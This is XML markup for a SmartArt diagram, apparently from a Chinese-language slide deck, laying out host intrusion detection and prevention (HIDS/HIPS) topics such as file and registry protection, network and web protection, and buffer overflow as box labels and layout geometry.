      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D27FE6F-92CA-4EF6-BFD8-CD3FEC21E79A}" type="sibTrans" cxnId="{A89BC91A-ABBF-4C18-B84F-FAD512D35C34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10E87F5B-7259-4057-8F83-797FFCCB4D75}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>HIDS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1193ED4-E4E7-47FF-AB2E-A13775D2E183}" type="parTrans" cxnId="{BC155DD8-43D9-4FCA-9C05-961B36C9EA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88D844CA-74EF-4FB1-8E4A-6B343259799D}" type="sibTrans" cxnId="{BC155DD8-43D9-4FCA-9C05-961B36C9EA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8B7EDAC-182C-4BED-A59E-9ED315C824E4}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="92D050"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>HIPS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4EDF419-668E-4E9F-BE8B-85BD70A2A623}" type="parTrans" cxnId="{B622035F-69CA-4BAA-BB51-F0C83A0B16ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB88612B-A0E2-4B87-9755-D95567051BD3}" type="sibTrans" cxnId="{B622035F-69CA-4BAA-BB51-F0C83A0B16ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" type="pres">
      <dgm:prSet presAssocID="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68AA4148-2173-4EBC-B29F-B4FF34C67FB8}" type="pres">
      <dgm:prSet presAssocID="{E7ED8B5E-A80E-485C-B363-26978F3DDCB8}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2898DF73-FB7F-43FB-B0CA-D7E7F0F4DF95}" type="pres">
      <dgm:prSet presAssocID="{E7225577-9242-479A-8178-1538A743A57B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8530C79-58EA-4EF3-ADF0-8CFE227BF2A7}" type="pres">
      <dgm:prSet presAssocID="{C58960E7-4EF9-4308-96F7-F6C03C6E0045}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6131C2E-9633-4FEF-A84D-1E46E69FB251}" type="pres">
      <dgm:prSet presAssocID="{5D27FE6F-92CA-4EF6-BFD8-CD3FEC21E79A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{398A296C-DDBE-47A2-88A7-6BC9C0CC21AB}" type="pres">
      <dgm:prSet presAssocID="{10E87F5B-7259-4057-8F83-797FFCCB4D75}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDC74227-4DAF-4CD8-A649-E3DFDB831317}" type="pres">
      <dgm:prSet presAssocID="{88D844CA-74EF-4FB1-8E4A-6B343259799D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{457C8165-B03F-48EF-960E-B63295134D73}" type="pres">
      <dgm:prSet presAssocID="{D8B7EDAC-182C-4BED-A59E-9ED315C824E4}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F651F513-02DB-46B8-B272-7FCF0312C0DA}" type="presOf" srcId="{C58960E7-4EF9-4308-96F7-F6C03C6E0045}" destId="{A8530C79-58EA-4EF3-ADF0-8CFE227BF2A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{A89BC91A-ABBF-4C18-B84F-FAD512D35C34}" srcId="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" destId="{C58960E7-4EF9-4308-96F7-F6C03C6E0045}" srcOrd="1" destOrd="0" parTransId="{6DEA0F89-DFA9-4A41-B97F-5442F9D0A035}" sibTransId="{5D27FE6F-92CA-4EF6-BFD8-CD3FEC21E79A}"/>
    <dgm:cxn modelId="{0815C02E-F57B-4377-9B2A-290F8E418C86}" srcId="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" destId="{E7ED8B5E-A80E-485C-B363-26978F3DDCB8}" srcOrd="0" destOrd="0" parTransId="{9DF5A6E2-5388-4ACE-BF94-62E5A55F43EF}" sibTransId="{E7225577-9242-479A-8178-1538A743A57B}"/>
    <dgm:cxn modelId="{B622035F-69CA-4BAA-BB51-F0C83A0B16ED}" srcId="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" destId="{D8B7EDAC-182C-4BED-A59E-9ED315C824E4}" srcOrd="3" destOrd="0" parTransId="{F4EDF419-668E-4E9F-BE8B-85BD70A2A623}" sibTransId="{BB88612B-A0E2-4B87-9755-D95567051BD3}"/>
    <dgm:cxn modelId="{20C61989-CA51-4F72-AB74-33ACDF56A6F4}" type="presOf" srcId="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" destId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{ADC258A5-10B8-48DE-8457-38E830849DE3}" type="presOf" srcId="{10E87F5B-7259-4057-8F83-797FFCCB4D75}" destId="{398A296C-DDBE-47A2-88A7-6BC9C0CC21AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{6BDE04B3-E96B-4D1D-AC98-59E15A6CC61E}" type="presOf" srcId="{D8B7EDAC-182C-4BED-A59E-9ED315C824E4}" destId="{457C8165-B03F-48EF-960E-B63295134D73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{A32A6FC5-1E56-4BF2-A150-DE8A562C1A39}" type="presOf" srcId="{E7ED8B5E-A80E-485C-B363-26978F3DDCB8}" destId="{68AA4148-2173-4EBC-B29F-B4FF34C67FB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{BC155DD8-43D9-4FCA-9C05-961B36C9EA21}" srcId="{33104485-A5D0-4AF7-A9E6-4EB4B401A449}" destId="{10E87F5B-7259-4057-8F83-797FFCCB4D75}" srcOrd="2" destOrd="0" parTransId="{B1193ED4-E4E7-47FF-AB2E-A13775D2E183}" sibTransId="{88D844CA-74EF-4FB1-8E4A-6B343259799D}"/>
    <dgm:cxn modelId="{16B22565-D633-4BEC-B994-E3158132A368}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{68AA4148-2173-4EBC-B29F-B4FF34C67FB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{7EE81187-D295-487E-98BF-6611FB4BFCB7}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{2898DF73-FB7F-43FB-B0CA-D7E7F0F4DF95}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{AA4E6B1F-3738-4BC5-B2CC-7F3FF97BF2A8}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{A8530C79-58EA-4EF3-ADF0-8CFE227BF2A7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{73B92004-4EAF-4DC2-B1EE-F0255773F3E1}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{F6131C2E-9633-4FEF-A84D-1E46E69FB251}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{12831992-9369-451B-A5F1-73234628A487}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{398A296C-DDBE-47A2-88A7-6BC9C0CC21AB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{BA6858D4-5F65-4111-94FD-288B832D40E4}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{CDC74227-4DAF-4CD8-A649-E3DFDB831317}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{52315EAC-7DED-413E-B7AB-F60FC637F5CB}" type="presParOf" srcId="{FEE0CA72-BEBD-4CD5-A1E5-2F59F207B1C3}" destId="{457C8165-B03F-48EF-960E-B63295134D73}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/defaul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9B43D-ABC7-46C8-82C3-681297B4C7DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4215549" y="1289970"/>
          <a:ext cx="3052541" cy="853168"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3052541" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3052541" y="853168"/>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70D98036-B49F-4963-A848-64D17059D048}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5230789" y="3145940"/>
          <a:ext cx="2706559" cy="828098"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2706559" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2706559" y="828098"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="00330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35F35AB2-1A65-439B-83FD-79C05CC52F85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5230789" y="3145940"/>
          <a:ext cx="776407" cy="828098"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="776407" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="776407" y="828098"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="00330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80F7C4EF-8F3A-48CE-AB84-80124D9B00B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4077044" y="3145940"/>
          <a:ext cx="1153744" cy="828098"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1153744" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1153744" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="828098"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="00330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EDB14B5E-B143-469D-B57A-3D4C9C6A0F72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2146892" y="3145940"/>
          <a:ext cx="3083896" cy="828098"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3083896" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3083896" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="681802"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="828098"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="00330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BA44529-A63A-4BFE-885E-0F789876865A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4215549" y="1289970"/>
          <a:ext cx="1015239" cy="853168"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1015239" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1015239" y="853168"/>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D0C8646-58AF-4BF2-AF58-C33831BEB8BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3193835" y="1289970"/>
          <a:ext cx="1021714" cy="853168"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1021714" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1021714" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="853168"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="508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FE71098-3182-402D-8CD3-1657F5586277}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1123543" y="1289970"/>
          <a:ext cx="3092006" cy="853168"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3092006" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3092006" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="706872"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="853168"/>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E13E43E-07CF-4376-8B9B-A6CD91B4ED42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3028374" y="287168"/>
          <a:ext cx="2374350" cy="100280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FBB9D9-5389-4419-B3DA-B5F803EFAAC7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3203842" y="453863"/>
          <a:ext cx="2374350" cy="1002801"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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b="1" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>HIDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2500" b="1" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>关键技术</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3233213" y="483234"/>
        <a:ext cx="2315608" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D1339A8A-B60F-4639-AC29-6938B28BC0A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="208885" y="2143139"/>
          <a:ext cx="18293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56BF4-C331-4906-87AD-6742D94A9203}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="384354" y="2309834"/>
          <a:ext cx="1829315" cy="1002801"/>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文件和注册表保护技术</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="413725" y="2339205"/>
        <a:ext cx="1770573" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E2FEE80E-66FF-4C35-9F5F-579399B41B8A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2279177" y="2143139"/>
          <a:ext cx="18293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BFAAD-189D-4E90-813B-3DDAF13F11C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2454645" y="2309834"/>
          <a:ext cx="1829315" cy="1002801"/>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网络安全</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204"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防护技术</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2484016" y="2339205"/>
        <a:ext cx="1770573" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CCEA0C0-3D06-472A-BEE2-FF3EC5601C1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4316131" y="2143139"/>
          <a:ext cx="18293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5A37-7713-4CF7-B2CB-0F0456BE3473}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4491599" y="2309834"/>
          <a:ext cx="1829315" cy="1002801"/>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altLang="en-US" sz="2400" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>WEB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>保护</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204"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技术</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4520970" y="2339205"/>
        <a:ext cx="1770573" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8735EA6E-634C-4B55-9546-CCD011D8F79A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1357284" y="3974039"/>
          <a:ext cx="15792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2EF32-2FBB-4A51-B07C-4A49E532EFE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1532753" y="4140734"/>
          <a:ext cx="1579215" cy="1002801"/>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sz="2400" b="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>HTTP</a:t>
          </a:r>
        </a:p>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请求类型</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1562124" y="4170105"/>
        <a:ext cx="1520473" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1B2509AB-C8A8-4AC2-9180-FEA4B95F569F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3287436" y="3974039"/>
          <a:ext cx="15792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DECAAF-6DCC-4271-8F2B-5385DBB0051D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3462905" y="4140734"/>
          <a:ext cx="1579215" cy="1002801"/>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缓冲区</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="10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溢出</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3492276" y="4170105"/>
        <a:ext cx="1520473" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EB315BF8-3204-43A5-8EBB-EF436E04DBE5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5217588" y="3974039"/>
          <a:ext cx="15792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FB4A67-CE93-4C95-BB3A-A89D6498B235}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5393057" y="4140734"/>
          <a:ext cx="1579215" cy="1002801"/>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关键字</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5422428" y="4170105"/>
        <a:ext cx="1520473" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5714384-3717-4B41-A36E-85AF272AFECC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7147740" y="3974039"/>
          <a:ext cx="15792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36E6B-A2CD-4479-B2D6-E54A7DAE1A87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7323209" y="4140734"/>
          <a:ext cx="1579215" cy="1002801"/>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物理目录</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7352580" y="4170105"/>
        <a:ext cx="1520473" cy="944059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{885F89CA-0414-4CE7-BA90-D0620FC91B24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6353433" y="2143139"/>
          <a:ext cx="1829315" cy="1002801"/>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CD2934-69D3-42E9-8472-75D517C29305}">
